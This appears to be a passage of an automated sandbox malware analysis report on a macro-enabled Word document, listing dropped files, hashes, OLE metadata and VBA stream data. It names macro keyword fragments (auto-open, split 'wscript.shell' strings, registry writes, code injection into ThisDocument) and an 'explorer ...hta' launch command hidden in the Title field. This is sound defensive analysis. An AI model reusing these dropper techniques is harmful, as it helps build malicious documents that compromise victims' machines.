                                                                                                                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:03 2020, mtime=Wed Apr 28 23:53:40 2021, atime=Wed Apr 28 23:53:37 2021, length=90627, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2180
                                                                                                                                                  Entropy (8bit):4.717758588277304
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8JwV2rEDQArK6bDyd7aB6myJwV2rEDQArK6bDyd7aB6m:86V2KrKEB6p6V2KrKEB6
                                                                                                                                                  MD5:EDEAA19361D5BBE087F35EC82095408D
                                                                                                                                                  SHA1:4CDE6D44946E1D6954394C9931EA340EAE0B6218
                                                                                                                                                  SHA-256:3A50C5BBE2F6648DF765AF1D93BA959AFC8F2C9EC40B13F96525DD28ABE86E8E
                                                                                                                                                  SHA-512:00B395C4F09AE2A46EC74C85FFF42995F5E69AD846AD3A5B33BF0BB3A7C5CC6A572AE0432ACA24205DE6C6A5F636C1378043C49447279762D94E72CD0F394542
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: L..................F.... .....8.8....L...<......<...b...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S.......................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.......Q.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..b...R.. .DATEI-~1.DOC..Z......>Q.u.R......f.....................4L..D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......[...............-.......Z...........>.S......C:\Users\user\Desktop\Datei-04.28.2021.doc..+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Aw...`.......X.......745773...........!a..%.H.VZAj...zXt.+........W...!a..%.H.VZAj...zXt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):86
                                                                                                                                                  Entropy (8bit):4.326022969633015
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                                                                                                                                                  MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                                                                                                                                                  SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                                                                                                                                                  SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                                                                                                                                                  SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):1.494861186799854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/Zd0lbkj3kllalRhlXlk:RtZCbyk2
                                                                                                                                                  MD5:4C507C3324F22A4C2BFFBDD520DD5674
                                                                                                                                                  SHA1:E44DB415A96B00B95B2BF061C7DEB3B8C88E0967
                                                                                                                                                  SHA-256:99A8179412ADA135B685AB226D0AF920DBF689422EE95A375EC687BF7561D775
                                                                                                                                                  SHA-512:2C99AC5A727014748E955F7117C3C2C2379993012A3167AB37A7C2C5E5E9F05DF197748EE3165A2E09E950926EFBFE1AE6F2DAA60CC141CD3B4B00D3AC483606
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h...................................pLA.......................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\~$tei-04.28.2021.doc
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):1.494861186799854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/Zd0lbkj3kllalRhlXlk:RtZCbyk2
                                                                                                                                                  MD5:4C507C3324F22A4C2BFFBDD520DD5674
                                                                                                                                                  SHA1:E44DB415A96B00B95B2BF061C7DEB3B8C88E0967
                                                                                                                                                  SHA-256:99A8179412ADA135B685AB226D0AF920DBF689422EE95A375EC687BF7561D775
                                                                                                                                                  SHA-512:2C99AC5A727014748E955F7117C3C2C2379993012A3167AB37A7C2C5E5E9F05DF197748EE3165A2E09E950926EFBFE1AE6F2DAA60CC141CD3B4B00D3AC483606
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h...................................pLA.......................................................

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                  Entropy (8bit):7.82220089201397
                                                                                                                                                  TrID:
                                                                                                                                                  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                  • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                  File name:Datei-04.28.2021.doc
                                                                                                                                                  File size:103261
                                                                                                                                                  MD5:6747583727ce069aa8ae9d398d35e5bc
                                                                                                                                                  SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                                                                                                                                                  SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                                                                                                                                                  SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                                                                                                                                                  SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                                                                                                                                                  File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:False
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                  Summary

                                                                                                                                                  Title:explorer c:\users\public\argumentSelectTmp.hta
                                                                                                                                                  Subject:
                                                                                                                                                  Author:ujmg
                                                                                                                                                  Keywords:
                                                                                                                                                  Template:Normal
                                                                                                                                                  Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
                                                                                                                                                  Revion Number:2
                                                                                                                                                  Total Edit Time:0
                                                                                                                                                  Create Time:2021-04-28T04:45:00Z
                                                                                                                                                  Last Saved Time:2021-04-28T04:45:00Z
                                                                                                                                                  Number of Pages:1
                                                                                                                                                  Number of Words:0
                                                                                                                                                  Number of Characters:0
                                                                                                                                                  Creating Application:Microsoft Office Word
                                                                                                                                                  Security:4

                                                                                                                                                  Document Summary

                                                                                                                                                  Number of Lines:2
                                                                                                                                                  Number of Paragraphs:0
                                                                                                                                                  Thumbnail Scaling Desired:false
                                                                                                                                                  Company:
                                                                                                                                                  Contains Dirty Links:false
                                                                                                                                                  Shared Document:false
                                                                                                                                                  Changed Hyperlinks:false
                                                                                                                                                  Application Version:16.0000

                                                                                                                                                  Streams with VBA

                                                                                                                                                  VBA File Name: ThisDocument.cls, Stream Size: 1127
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/ThisDocument
                                                                                                                                                  VBA File Name:ThisDocument.cls
                                                                                                                                                  Stream Size:1127
                                                                                                                                                  Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . - . . i . H . ! . . W D Q . . . . . . . . K . . . . y . ' y . . . . . . . . . . . . . . . . . . . . X . O z . Y $ L . . . & . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . X . O z . Y $ L . . . & . . . - . . - . . i . H . ! . . W D Q . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 71 cc 96 90 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 03 7f 2d b5 fa 69 1d 48 9e 21 86 f4 57 44 51 84 ef 8e e3 9e df be fe 4b b5 1f 1d 00 79 ba 27 79 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  "ThisDocument"
                                                                                                                                                  VBA Code
                                                                                                                                                  VBA File Name: UserForm1.frm, Stream Size: 1182
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/UserForm1
                                                                                                                                                  VBA File Name:UserForm1.frm
                                                                                                                                                  Stream Size:1182
                                                                                                                                                  Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . q . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 71 cc 28 c6 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  False
                                                                                                                                                  VB_Exposed
                                                                                                                                                  Attribute
                                                                                                                                                  VB_Name
                                                                                                                                                  VB_Creatable
                                                                                                                                                  VB_PredeclaredId
                                                                                                                                                  VB_GlobalNameSpace
                                                                                                                                                  VB_Base
                                                                                                                                                  VB_Customizable
                                                                                                                                                  VB_TemplateDerived
                                                                                                                                                  VBA Code
                                                                                                                                                  VBA File Name: listCopy.bas, Stream Size: 1037
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/listCopy
                                                                                                                                                  VBA File Name:listCopy.bas
                                                                                                                                                  Stream Size:1037
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . q . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 92 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 02 00 00 6d 03 00 00 00 00 00 00 01 00 00 00 71 cc c1 2d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  "listCopy"
                                                                                                                                                  clearIteratorRef
                                                                                                                                                  Attribute
                                                                                                                                                  autoopen()
                                                                                                                                                  convertIndex
                                                                                                                                                  VB_Name
                                                                                                                                                  viewValueTextbox
                                                                                                                                                  memoryIndex
                                                                                                                                                  String
                                                                                                                                                  VBA Code
                                                                                                                                                  VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/optionRemoveGeneric
                                                                                                                                                  VBA File Name:optionRemoveGeneric.bas
                                                                                                                                                  Stream Size:1304
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 e9 03 00 00 00 00 00 00 01 00 00 00 71 cc 13 c4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  optionPtr.Quit
                                                                                                                                                  False
                                                                                                                                                  optionPtr
                                                                                                                                                  String)
                                                                                                                                                  Attribute
                                                                                                                                                  optionPtr.Documents.Add
                                                                                                                                                  collectionSelect
                                                                                                                                                  VB_Name
                                                                                                                                                  CreateObject("word.application")
                                                                                                                                                  "optionRemoveGeneric"
                                                                                                                                                  memoryTempTrust
                                                                                                                                                  memoryIndex(memoryTempTrust
                                                                                                                                                  optionPtr.Visible
                                                                                                                                                  SaveChanges:=wdDoNotSaveChanges
                                                                                                                                                  collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
                                                                                                                                                  VBA Code
                                                                                                                                                  VBA File Name: refConvertCaption.bas, Stream Size: 1636
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/refConvertCaption
                                                                                                                                                  VBA File Name:refConvertCaption.bas
                                                                                                                                                  Stream Size:1636
                                                                                                                                                  Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . q . u m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 62 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 03 00 00 0d 05 00 00 00 00 00 00 01 00 00 00 71 cc 75 6d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  String)
                                                                                                                                                  VB_Name
                                                                                                                                                  vbSwap
                                                                                                                                                  "refConvertCaption"
                                                                                                                                                  memCaptionOption.Text
                                                                                                                                                  StrConv(captionPaste,
                                                                                                                                                  Function
                                                                                                                                                  vbSwap.createElement("code")
                                                                                                                                                  exceptionPointer
                                                                                                                                                  Object
                                                                                                                                                  Variant
                                                                                                                                                  memConvertStruct)
                                                                                                                                                  ptrPtrStorage
                                                                                                                                                  memCaptionOption.DataType
                                                                                                                                                  constCollectionDatabase
                                                                                                                                                  memCaptionOption
                                                                                                                                                  memCaptionOption.nodeTypedValue
                                                                                                                                                  exceptionPointer(captionPaste,
                                                                                                                                                  ptrPtrStorage(constCollectionDatabase
                                                                                                                                                  Attribute
                                                                                                                                                  VBA Code
                                                                                                                                                  VBA File Name: repoText.bas, Stream Size: 2970
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/repoText
                                                                                                                                                  VBA File Name:repoText.bas
                                                                                                                                                  Stream Size:2970
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 16 03 00 00 f0 00 00 00 aa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b1 04 00 00 b9 08 00 00 00 00 00 00 01 00 00 00 71 cc 1c 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                  VBA Code Keywords

                                                                                                                                                  Keyword
                                                                                                                                                  convertIndex
                                                                                                                                                  String)
                                                                                                                                                  "repoText"
                                                                                                                                                  clearRefLoad
                                                                                                                                                  .RegWrite
                                                                                                                                                  VB_Name
                                                                                                                                                  Public
                                                                                                                                                  Function
                                                                                                                                                  varClass
                                                                                                                                                  String
                                                                                                                                                  Application.Version
                                                                                                                                                  captionBufData()
                                                                                                                                                  textExButton
                                                                                                                                                  vbUnicode)
                                                                                                                                                  Chr$(Val("&H"
                                                                                                                                                  clearRefLoad,
                                                                                                                                                  "jZXNzVkJPTQ=="),
                                                                                                                                                  Mid$(tempClearIndex,
                                                                                                                                                  arrayOption
                                                                                                                                                  Len(tempClearIndex)
                                                                                                                                                  mainExLocal
                                                                                                                                                  listboxNextVar()
                                                                                                                                                  CreateObject("ws"
                                                                                                                                                  "VjdXJpdHlcQWN"
                                                                                                                                                  viewValueTextbox()
                                                                                                                                                  trustStruct
                                                                                                                                                  tempClearIndex
                                                                                                                                                  globalResponse
                                                                                                                                                  textExButton(ByVal
                                                                                                                                                  varClass()
                                                                                                                                                  arrayOption,
                                                                                                                                                  countSelect
                                                                                                                                                  captionBufData
                                                                                                                                                  titleSize
                                                                                                                                                  Attribute
                                                                                                                                                  "REG_DWORD"
                                                                                                                                                  "cript.sh"
                                                                                                                                                  "ell")
                                                                                                                                                  convertIndex()
                                                                                                                                                  listboxNextVar
                                                                                                                                                  clearReference
                                                                                                                                                  mainExLocal()
                                                                                                                                                  VBA Code

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:689
                                                                                                                                                  Entropy:5.29372046772
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
                                                                                                                                                  Data Raw:49 44 3d 22 7b 32 41 38 41 34 39 35 31 2d 42 35 43 31 2d 34 43 39 43 2d 41 45 31 36 2d 45 44 42 31 45 33 45 37 35 34 38 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                                                                                                                                                  Stream Path: PROJECTwm, File Type: data, Stream Size: 239
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:239
                                                                                                                                                  Entropy:3.53833137583
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
                                                                                                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 6c 69 73 74 43 6f 70 79 00 6c 00 69 00 73 00 74 00 43 00 6f 00 70 00 79 00 00 00 72 65 66 43 6f 6e 76 65 72 74 43 61 70 74 69 6f 6e 00 72 00 65 00 66 00 43 00 6f 00 6e 00 76 00
                                                                                                                                                  Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/\x1CompObj
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:97
                                                                                                                                                  Entropy:3.61064918306
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:292
                                                                                                                                                  Entropy:4.58743694765
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                  Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                  Stream Path: UserForm1/f, File Type: data, Stream Size: 90
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/f
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:90
                                                                                                                                                  Entropy:2.89102698747
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
